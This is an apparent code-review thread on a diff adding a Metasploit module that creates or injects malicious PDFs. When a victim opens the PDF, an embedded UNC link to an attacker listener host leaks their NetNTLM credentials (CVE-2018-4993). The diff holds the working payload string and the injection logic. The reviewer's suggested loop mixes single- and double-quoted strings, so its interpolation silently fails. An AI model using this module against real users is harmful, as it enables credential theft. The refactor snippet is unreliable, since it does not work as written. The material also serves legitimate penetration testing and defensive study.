modules/auxiliary/fileformat/badpdf.rb

```diff
@@ -0,0 +1,164 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Auxiliary
+  include Msf::Exploit::FILEFORMAT
+
+  def initialize(info={})
+    super( update_info( info,
+        'Name'          => 'BADPDF Malicious PDF Creator',
+        'Description'   => %q{
+          This module can either creates a blank PDF file which contains a UNC link which can be used
+          to capture NetNTLM credentials, or if the PDFINJECT option is used it will inject the necessary
+          code into an existing PDF document if possible.
+        },
+        'License'       => MSF_LICENSE,
+        'Author'        =>
+            [
+              'Assaf Baharav',    # Code provided as POC by CheckPoint
+              'Yaron Fruchtmann', # Code provided as POC by CheckPoint
+              'Ido Solomon',      # Code provided as POC by CheckPoint
+              'Richard Davy - secureyourit.co.uk',  # Metasploit
+            ],
+        'Platform'      => [ 'win' ],
+        'References'    =>
+        [
+          ['CVE', '2018-4993'],
+          ['URL', 'https://research.checkpoint.com/ntlm-credentials-theft-via-pdf-files/']
+        ]
+
+      ))
+    register_options(
+      [
+        OptAddress.new("LHOST", [ true, "Host listening for incoming SMB/WebDAV traffic", nil]),
+        OptString.new("FILENAME", [ false, "Filename"]),
+        OptPath.new("PDFINJECT", [ false, "Path and filename to existing PDF to inject UNC link code into"]),
+
+      ])
+  end
+
+  def run
+    if !datastore['PDFINJECT'].nil? && datastore['PDFINJECT'].to_s.end_with?('.pdf')
+        injectpdf
+    else
+        if !datastore['FILENAME'].nil? && datastore['FILENAME'].to_s.end_with?('.pdf')
+          createpdf
+        else
+          print_error "FILENAME is empty, please enter FILENAME and rerun module"
+        end
+    end
+  end
+
+  def injectpdf
+    #Payload which gets injected
+    inject_payload = "/AA <</O <</F (\\\\\\\\#{datastore['LHOST']}\\\\test)/D [ 0 /Fit]/S /GoToE>>>>"
+
+    unless File.exists?(datastore['PDFINJECT'])
+      #If file not found display error message
+      print_error "File doesn't exist #{datastore['PDFINJECT']}"
+      return
+    end
+
+    #Read in contents of file
+    content = File.read(datastore['PDFINJECT'])
+
+    #Check for place holder - below ..should.. cover most scenarios.
```

Comment:
I'm not overly familiar with PDF file format.

This code looks repetitive and could be simplified by looping over `[2, 4, 6, 8]`.

Reply:
Don't know how I would do this and make it simpler.

Reply:
```ruby
    #Check for place holder - below ..should.. cover most scenarios.
    [2, 4, 6, 8].each do |blah|
      unless content.index("/Contents #{blah} 0 R").nil?
        #If place holder exists create new file content
        newdata = content[0..(content.index('/Contents #{blah} 0 ')+14)]+inject_payload+content[(content.index('/Contents #{blah} 0 R')+15)..-1]
        break
      end
    end
```